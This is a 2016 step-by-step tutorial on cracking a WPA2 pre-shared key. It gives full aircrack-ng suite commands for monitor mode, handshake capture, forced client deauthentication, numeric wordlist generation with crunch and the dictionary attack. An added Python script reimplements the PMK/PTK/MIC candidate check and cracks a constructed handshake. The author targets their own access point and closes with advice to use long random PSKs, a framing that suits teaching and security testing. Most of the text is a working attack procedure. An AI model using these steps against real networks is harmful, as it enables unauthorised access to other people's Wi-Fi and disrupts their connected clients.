Wi-Fi Attack. WPA2 Pre-Shared Key Cracking.
12 Jun 2016
In this article we will study how an attacker can gain access to a Wi-Fi access point protected with a WPA2 pre-shared key (PSK). We will use the Kali Linux distribution and the penetration-testing tools aircrack-ng and crunch.
1. Identify the wireless network interface (wlan0 in this article).
2. Put the wireless card into monitor mode. airmon-ng creates a new monitor interface, wlan0mon, which the following steps use.
# airmon-ng start wlan0
3. Check that the card is compatible with aircrack-ng.
Not every chipset and driver supports monitor mode and packet injection; the aircrack-ng project maintains a compatibility list of wireless chipsets and drivers. Packet injection is required for the deauthentication in step 6.
4. Run wireless packet capture.
# airodump-ng wlan0mon
For demonstration purposes we will crack our own access point. Its MAC address (BSSID) is AA:53:95:B8:89:C7 and it operates on channel 1; airodump-ng also lists its network name (ESSID).
5. Capture and save the traffic of the target access point. Leave this running during the next step; --write AP produces the capture file AP-01.cap used in step 8.
# airodump-ng --bssid AA:53:95:B8:89:C7 -c 1 --write AP wlan0mon
6. Deauthenticate the client.
We need to deauthenticate a connected client so that it reconnects and performs the 4-way handshake again, which the airodump-ng session from step 5 records. The client's MAC address is 00:26:5E:81:29:8A.
# aireplay-ng -0 1 -a AA:53:95:B8:89:C7 -c 00:26:5E:81:29:8A wlan0mon
In some cases you get the message "Couldn't determine current channel for wlan0mon, you should either force the operation with --ignore-negative-one or apply a kernel patch". As a result, the attempt to deauthenticate the client can fail. I ran into this problem while testing aircrack-ng on Ubuntu Desktop.
Our attempt was successful, so "WPA handshake: AA:53:95:B8:89:C7" appears in the top right corner of the airodump-ng output (step 5).
Let's check the captured packets with Wireshark. Apply "eapol" as the display filter to see the four EAPOL-Key frames of the 4-way handshake. aircrack-ng does not need all four: message 2 (which carries the client's nonce and the MIC) together with message 1 or 3 (which carry the access point's nonce) is enough.
7. Prepare a wordlist dictionary.
We assume that the PSK of the access point is an eight-digit number. We will use the password generator crunch to prepare the dictionary. crunch 8 8 0123456789 writes every 8-character string over the digits 0-9, i.e. 10^8 candidates, one per line (about 900 MB on disk).
# crunch 8 8 0123456789 -o number_password.list
8. Run PSK attack.
# aircrack-ng AP-01.cap -w number_password.list
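To show what step 8 actually does with the EAPOL-Key frames inspected in step 6, here is an added example (not aircrack-ng's code and not part of the original article) that performs the same per-candidate check in pure Python: derive the PMK with PBKDF2-HMAC-SHA1 from passphrase and ESSID, expand it to the PTK with the two MAC addresses and the two nonces, and compare the HMAC-SHA1 MIC of message 2 with the captured one. The BSSID and client MAC are the ones from this article; the ESSID "TestAP", the nonces, the "true" PSK and the EAPOL frame layout are constructed for the example, and the "captured" MIC is produced by the same code with the true passphrase, so the example runs offline without a capture file.

```python
"""WPA2-PSK candidate verification, the check aircrack-ng repeats for every
wordlist entry. Added example, not aircrack-ng code; handshake values below
are constructed (ESSID, nonces and PSK are assumptions)."""
import hashlib
import hmac
import struct
from typing import Optional

MIC_OFFSET = 81   # offset of the 16-byte MIC field inside an EAPOL-Key frame
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 256 bits).
    This is the expensive step a dictionary attack pays once per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1 blocks with a counter byte, truncated to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_key_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (descriptor version 2) MIC: HMAC-SHA1 over the frame with the MIC
    field zeroed, truncated to 128 bits. KCK is the first 16 bytes of the PTK."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Constructed EAPOL-Key frame shaped like message 2 of the 4-way handshake
    (RSN descriptor, key info = MIC|Pairwise|version 2, empty key data)."""
    body = struct.pack(">BHH", 2, 0x010A, 16)          # descriptor type, key info, key length
    body += (1).to_bytes(8, "big")                      # replay counter
    body += snonce                                      # key nonce = SNonce
    body += b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # key IV, key RSC, key ID
    body += mic + struct.pack(">H", 0)                  # MIC, key data length
    return struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL v2, type EAPOL-Key


def check_passphrase(passphrase: str, hs: dict) -> bool:
    pmk = pmk_from_passphrase(passphrase, hs["ssid"])
    ptk = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_key_mic(ptk[:16], hs["eapol_msg2"]), hs["mic"])


def crack(hs: dict, wordlist) -> Optional[str]:
    """Dictionary attack: first candidate whose MIC matches, or None."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")
        if check_passphrase(candidate, hs):
            return candidate
    return None


def numeric_wordlist(start: int, count: int):
    """A slice of the keyspace that `crunch 8 8 0123456789` writes in full."""
    for n in range(start, start + count):
        yield f"{n:08d}"


# Constructed "capture": the values airodump-ng would have saved into AP-01.cap.
AP_MAC = bytes.fromhex("AA5395B889C7")    # BSSID from the article
STA_MAC = bytes.fromhex("00265E81298A")   # client MAC from the article
SSID = "TestAP"                           # assumed ESSID
ANONCE = bytes(range(32))                 # constructed nonces
SNONCE = bytes(range(32, 64))
TRUE_PSK = "20160612"                     # assumed eight-digit PSK


def constructed_handshake(true_psk: str = TRUE_PSK) -> dict:
    """Produce message 2 and its MIC as the real client would have."""
    kck = ptk_from_pmk(pmk_from_passphrase(true_psk, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_key_mic(kck, build_eapol_msg2(SNONCE))
    return {"ssid": SSID, "ap_mac": AP_MAC, "sta_mac": STA_MAC,
            "anonce": ANONCE, "snonce": SNONCE,
            "eapol_msg2": build_eapol_msg2(SNONCE, mic), "mic": mic}


if __name__ == "__main__":
    hs = constructed_handshake()
    found = crack(hs, numeric_wordlist(20160600, 50))
    print("KEY FOUND!" if found else "KEY NOT FOUND", found)
```

Only the PBKDF2 step depends on the candidate alone; everything after it is cheap, which is why aircrack-ng's speed is reported in PMKs per second and why a keyspace of 10^8 eight-digit PINs is small: it is the size of the keyspace, not the per-candidate cost, that decides how long step 8 takes.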
Every candidate costs the attacker one PBKDF2 derivation, so the only real defence is a keyspace too large to enumerate: use a long, random PSK (not a short numeric or dictionary-based one) to protect access to the Wi-Fi access point.